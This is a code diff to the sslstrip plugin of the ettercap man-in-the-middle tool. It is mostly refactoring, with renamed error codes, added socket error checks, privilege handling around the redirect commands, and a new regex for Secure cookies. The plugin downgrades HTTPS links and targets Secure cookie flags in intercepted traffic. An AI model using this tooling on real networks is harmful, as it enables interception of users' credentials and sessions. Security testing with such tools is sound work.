@@ -29,6 +29,8 @@
 #include <ec_socket.h>
 #include <ec_threads.h>
 #include <ec_decode.h>
+#include <ec_utils.h>
+#include <ec_sleep.h>
 
 #include <sys/wait.h>
 
@@ -66,7 +68,8 @@
 //#define URL_PATTERN "(href=|src=|url\\(|action=)?[\"']?(https)://([^ \r\\)/\"'>\\)]*)/?([^ \\)\"'>\\)\r]*)"
 //#define URL_PATTERN "(href=|src=|url\\(|action=)?[\"']?(https)(\\%3A|\\%3a|:)//([^ \r\\)/\"'>\\)]*)/?([^ \\)\"'>\\)\r]*)"
 #define URL_PATTERN "(https://[\\w\\d:#@%/;$()~_?\\+-=\\\\.&]*)"
-#define COOKIE_PATTERN "Set-Cookie: (.*?;)(.?Secure;|.?Secure)(.*?)\r\n"
+//#define COOKIE_PATTERN "Set-Cookie: (.*?;)(.?Secure;|.?Secure)(.*?)\r\n"
+#define COOKIE_PATTERN "Set-Cookie: ([ \\w\\d:#@%/;$()~_?\\+-=\\\\.&]+); ?Secure"
 
 
 #define REQUEST_TIMEOUT 120 /* If a request has not been used in 120 seconds, remove it from list */
@@ -83,7 +86,7 @@
 #define HTTP_MAX (1024*200) //200KB max for HTTP requests.
 
 #define BREAK_ON_ERROR(x,y,z) do {  \
-   if (x == -EINVALID ) {            \
+   if (x == -E_INVALID ) {            \
      http_wipe_connection(y);      \
      SAFE_FREE(z.DATA.data);       \
      SAFE_FREE(z.DATA.disp_data);  \
@@ -119,7 +122,7 @@ struct http_request {
 
 struct http_response {
 	char *html;
-	size_t len;
+	unsigned long int len;
 };
 
 struct http_connection {
@@ -168,7 +171,7 @@ static void Find_Url(u_char *to_parse, char **ret);
 static int http_sync_conn(struct http_connection *connection);
 static int http_get_peer(struct http_connection *connection);
 static int http_read(struct http_connection *connection, struct packet_object *po);
-static int http_write(int fd, char *ptr, size_t total_len);
+static int http_write(int fd, char *ptr, unsigned long int total_len);
 static int http_insert_redirect(u_int16 dport);
 static int http_remove_redirect(u_int16 port);
 static void http_remove_header(char *header, struct http_connection *connection);
@@ -198,12 +201,12 @@ static EC_THREAD_FUNC(http_accept_thread);
 #define PO_FROMSSLSTRIP ((u_int16)(1<<13))
 
 struct plugin_ops sslstrip_ops = {
-	ettercap_version:	EC_VERSION, /* must match global EC_VERSION */
-	name:			"sslstrip",
-	info:			"SSLStrip plugin",
-	version:		"1.1",
-	init:			&sslstrip_init,
-	fini:			&sslstrip_fini,
+	.ettercap_version =	EC_VERSION, /* must match global EC_VERSION */
+	.name =			"sslstrip",
+	.info =			"SSLStrip plugin",
+	.version =		"1.1",
+	.init =			&sslstrip_init,
+	.fini =			&sslstrip_fini,
 };
 
 int plugin_load(void *handle)
@@ -215,11 +218,16 @@ static int sslstrip_init(void *dummy)
 {
 	const char *error;
 	int erroroffset;
+	int err;
+	char errbuf[100];
+
+   /* variable not used */
+   (void) dummy;
 
 	/*
 	 * Add IPTables redirect for port 80
          */
-	if (http_bind_wrapper() != ESUCCESS) {
+	if (http_bind_wrapper() != E_SUCCESS) {
 		USER_MSG("SSLStrip: plugin load failed: Could not set up HTTP redirect\n");
 		return PLUGIN_FINISHED;
 	}
@@ -232,9 +240,11 @@ static int sslstrip_init(void *dummy)
 		return PLUGIN_FINISHED;
 	}	
 
-	if(regcomp(&find_cookie_re, COOKIE_PATTERN, REG_EXTENDED | REG_NEWLINE | REG_ICASE)) {
-		USER_MSG("SSLStrip: plugin load failed: Could not compile find_cookie regex\n");
-                pcre_free(https_url_pcre);
+	err = regcomp(&find_cookie_re, COOKIE_PATTERN, REG_EXTENDED | REG_NEWLINE | REG_ICASE);
+	if (err) {
+		regerror(err, &find_cookie_re, errbuf, sizeof(errbuf));
+		USER_MSG("SSLStrip: plugin load failed: Could not compile find_cookie regex: %d\n", err);
+		pcre_free(https_url_pcre);
 		http_remove_redirect(bind_port);
 		return PLUGIN_FINISHED;
 	}
@@ -253,8 +263,11 @@ static int sslstrip_init(void *dummy)
 static int sslstrip_fini(void *dummy)
 {
 
+   /* variable not used */
+   (void) dummy;
+
 	DEBUG_MSG("SSLStrip: Removing redirect\n");
-	if (http_remove_redirect(bind_port) != ESUCCESS) {
+	if (http_remove_redirect(bind_port) != E_SUCCESS) {
 		USER_MSG("SSLStrip: Unable to remove HTTP redirect, please do so manually.\n");
 	}
 
@@ -459,8 +472,8 @@ static int http_insert_redirect(u_int16 dport)
 
 	if (GBL_CONF->redir_command_on == NULL)
 	{
-		USER_MSG("SSLStrip: cannot setup the redirect, did you uncomment the redir_command_on command on your etter.conf file?");
-		return -EFATAL;
+		USER_MSG("SSLStrip: cannot setup the redirect, did you uncomment the redir_command_on command on your etter.conf file?\n");
+		return -E_FATAL;
 	}
 	snprintf(asc_dport, 16, "%u", dport);
 
@@ -487,26 +500,28 @@ static int http_insert_redirect(u_int16 dport)
 
 	switch(fork()) {
 		case 0:
+			regain_privs();
 			execvp(param[0], param);
+			drop_privs();
 			WARN_MSG("Cannot setup http redirect (command: %s), please edit your etter.conf file and put a valid value in redir_command_on field\n", param[0]);
 			safe_free_http_redirect(param, &param_length, command, orig_command);
-			_exit(EINVALID);
+			_exit(-E_INVALID);
 		case -1:
 			safe_free_http_redirect(param, &param_length, command, orig_command);
-			return -EINVALID;
+			return -E_INVALID;
 		default:
 			wait(&ret_val);
-			if (WEXITSTATUS(ret_val)) {
+			if (WIFEXITED(ret_val) && WEXITSTATUS(ret_val)) {
 			    USER_MSG("SSLStrip: redir_command_on had non-zero exit status (%d): [%s]\n", WEXITSTATUS(ret_val), orig_command);
 			    safe_free_http_redirect(param, &param_length, command, orig_command);
-			    return -EINVALID;
+			    return -E_INVALID;
 			}
 			break;
 	}
 
 	safe_free_http_redirect(param, &param_length, command, orig_command);
 
-	return ESUCCESS;
+	return E_SUCCESS;
 }
 
 static int http_remove_redirect(u_int16 dport)
@@ -520,7 +535,7 @@ static int http_remove_redirect(u_int16 dport)
         if (GBL_CONF->redir_command_off == NULL)
 	{
 		USER_MSG("SSLStrip: cannot remove the redirect, did you uncomment the redir_command_off command on your etter.conf file?");
-		return -EFATAL;
+		return -E_FATAL;
 	}
 
         snprintf(asc_dport, 16, "%u", dport);
@@ -548,26 +563,28 @@ static int http_remove_redirect(u_int16 dport)
 
         switch(fork()) {
 		case 0:
+			regain_privs();
 			execvp(param[0], param);
+			drop_privs();
 			WARN_MSG("Cannot remove http redirect (command: %s), please edit your etter.conf file and put a valid value in redir_command_on field\n", param[0]);
 			safe_free_http_redirect(param, &param_length, command, orig_command);
-			_exit(EINVALID);
+			_exit(-E_INVALID);
                 case -1:
                         safe_free_http_redirect(param, &param_length, command, orig_command);
-                        return -EINVALID;
+                        return -E_INVALID;
                 default:
                         wait(&ret_val);
-                        if (WEXITSTATUS(ret_val)) {
+                        if (WIFEXITED(ret_val) && WEXITSTATUS(ret_val)) {
                             USER_MSG("SSLStrip: redir_command_off had non-zero exit status (%d): [%s]\n", WEXITSTATUS(ret_val), orig_command);
                             safe_free_http_redirect(param, &param_length, command, orig_command);
-                            return -EINVALID;
+                            return -E_INVALID;
                         }
                         break;
         }
 
         safe_free_http_redirect(param, &param_length, command, orig_command);
 
-        return ESUCCESS;
+        return E_SUCCESS;
 }
 
 static EC_THREAD_FUNC(http_accept_thread)
@@ -578,6 +595,9 @@ static EC_THREAD_FUNC(http_accept_thread)
 	int optval = 1;
 	socklen_t optlen = sizeof(optval);
 
+   /* variable not used */
+   (void) EC_THREAD_PARAM;
+
 	ec_thread_init();
 
 	DEBUG_MSG("SSLStrip: http_accept_thread initialized and ready");
@@ -640,23 +660,13 @@ static int http_get_peer(struct http_connection *connection)
 
 	http_create_ident(&ident, &po);
 
-#ifndef OS_WINDOWS
-	struct timespec tm;
-	tm.tv_sec = HTTP_WAIT;
-	tm.tv_nsec = 0;
-#endif
-
 	/* Wait for sniffing thread */
-	for (i=0; i<HTTP_RETRY && session_get_and_del(&s, ident, HTTP_IDENT_LEN)!=ESUCCESS; i++)
-#ifndef OS_WINDOWS
-	nanosleep(&tm, NULL);
-#else	
-	usleep(HTTP_WAIT);
-#endif
+	for (i=0; i<HTTP_RETRY && session_get_and_del(&s, ident, HTTP_IDENT_LEN)!=E_SUCCESS; i++)
+	ec_usleep(SEC2MICRO(HTTP_WAIT));
 
 	if (i==HTTP_RETRY) {
 		SAFE_FREE(ident);
-		return -EINVALID;
+		return -E_INVALID;
 	}
 
 	memcpy(&connection->ip[HTTP_SERVER], s->data, sizeof(struct ip_addr));
@@ -673,7 +683,7 @@ static int http_get_peer(struct http_connection *connection)
 #endif
 
 	
-	return ESUCCESS;
+	return E_SUCCESS;
 
 }
 
@@ -699,12 +709,12 @@ static size_t http_create_ident(void **i, struct packet_object *po)
 
 static int http_sync_conn(struct http_connection *connection) 
 {
-	if (http_get_peer(connection) != ESUCCESS)
-		return -EINVALID;
+	if (http_get_peer(connection) != E_SUCCESS)
+		return -E_INVALID;
 
 
 	set_blocking(connection->fd, 0);
-	return ESUCCESS;
+	return E_SUCCESS;
 }
 
 static int http_read(struct http_connection *connection, struct packet_object *po)
@@ -716,7 +726,7 @@ static int http_read(struct http_connection *connection, struct packet_object *p
 	po->DATA.len = len;
 
 	if(len <= 0)
-		return -EINVALID;
+		return -E_INVALID;
 
 	return len;	
 }
@@ -896,7 +906,7 @@ static void http_send(struct http_connection *connection, struct packet_object *
 	DEBUG_MSG("SSLStrip: after removing all %s", connection->response->html);
 	//Send result back to client
 	DEBUG_MSG("SSLStrip: Sending response back to client");
-	if (http_write(connection->fd, connection->response->html, connection->response->len) != ESUCCESS){
+	if (http_write(connection->fd, connection->response->html, connection->response->len) != E_SUCCESS){
 		DEBUG_MSG("Unable to send HTTP response back to client\n");
 	} else {
 		DEBUG_MSG("Sent HTTP response back to client");
@@ -937,16 +947,13 @@ static void http_send(struct http_connection *connection, struct packet_object *
 	DEBUG_MSG("SSLStrip: Done");
 }
 
-static int http_write(int fd, char *ptr, size_t total_len)
+static int http_write(int fd, char *ptr, unsigned long int total_len)
 {
 	int len, err;
 	unsigned int bytes_sent = 0;
 	int bytes_remaining = total_len;
-	struct timespec tm;
-	tm.tv_sec = 0;
-	tm.tv_nsec = 100 * 1000 * 1000; //100ms
 
-	DEBUG_MSG("SSLStrip: Total length %ld", total_len);
+	DEBUG_MSG("SSLStrip: Total length %lu", total_len);
 
 	while (bytes_sent < total_len) {
 
@@ -958,7 +965,7 @@ static int http_write(int fd, char *ptr, size_t total_len)
 			err = GET_SOCK_ERRNO();
 			DEBUG_MSG("http_write: SOCK ERR: %d", err);
 			if (err != EAGAIN && err != EINTR)
-				return -EINVALID;
+				return -E_INVALID;
 		}
 
 		DEBUG_MSG("SSLStrip: Sent %d bytes", len);
@@ -967,12 +974,12 @@ static int http_write(int fd, char *ptr, size_t total_len)
 		bytes_remaining -= len;
 
 		DEBUG_MSG("SSLStrip: Bytes sent %d", bytes_sent);
-		nanosleep(&tm, NULL);
+      ec_usleep(MILLI2MICRO(100)); // 100ms
 
 	
 	}
 
-	return ESUCCESS;
+	return E_SUCCESS;
 }
 
 #if 0
@@ -1037,7 +1044,7 @@ EC_THREAD_FUNC(http_child_thread)
 	ec_thread_init();
 
 	/* Get peer and set to non-blocking */
-	if (http_sync_conn(connection) == -EINVALID) {
+	if (http_sync_conn(connection) == -E_INVALID) {
 		DEBUG_MSG("SSLStrip: Could not get peer!!");
 		if (connection->fd != -1)
 			close_socket(connection->fd);
@@ -1197,15 +1204,15 @@ static void http_parse_packet(struct http_connection *connection, int direction,
 	gettimeofday(&po->ts, NULL);
 
 	switch(ip_addr_is_local(&PACKET->L3.src, NULL)) {
-		case ESUCCESS:
+		case E_SUCCESS:
 			PACKET->PASSIVE.flags &= ~FP_HOST_NONLOCAL;
 			PACKET->PASSIVE.flags |= FP_HOST_LOCAL;
 			break;
-		case -ENOTFOUND:
+		case -E_NOTFOUND:
 			PACKET->PASSIVE.flags &= ~FP_HOST_LOCAL;
 			PACKET->PASSIVE.flags |= FP_HOST_NONLOCAL;
 			break;
-		case -EINVALID:
+		case -E_INVALID:
 			PACKET->PASSIVE.flags = FP_UNKNOWN;
 			break;
 	}
@@ -1265,6 +1272,10 @@ static int http_bind_wrapper(void)
 	DEBUG_MSG("http_listen_thread: initialized and ready");
 	
 	main_fd = socket(AF_INET, SOCK_STREAM, 0);
+        if (main_fd == -1) { /* oops, unable to create socket */
+            DEBUG_MSG("Unable to create socket() for HTTP...");
+            return -E_FATAL;
+        }
 	memset(&sa_in, 0, sizeof(sa_in));
 	sa_in.sin_family = AF_INET;
 	sa_in.sin_addr.s_addr = INADDR_ANY;
@@ -1274,13 +1285,16 @@ static int http_bind_wrapper(void)
 		sa_in.sin_port = htons(bind_port);	
 	} while (bind(main_fd, (struct sockaddr *)&sa_in, sizeof(sa_in)) != 0);
 
-	listen(main_fd, 100);
+	if(listen(main_fd, 100) == -1) {
+            DEBUG_MSG("SSLStrip plugin: unable to listen() on socket");
+            return -E_FATAL;
+        }
 	USER_MSG("SSLStrip plugin: bind 80 on %d\n", bind_port);
 	
-	if (http_insert_redirect(bind_port) != ESUCCESS)
-		return -EFATAL;
+	if (http_insert_redirect(bind_port) != E_SUCCESS)
+		return -E_FATAL;
 
-	return ESUCCESS;
+	return E_SUCCESS;
 
 }
 
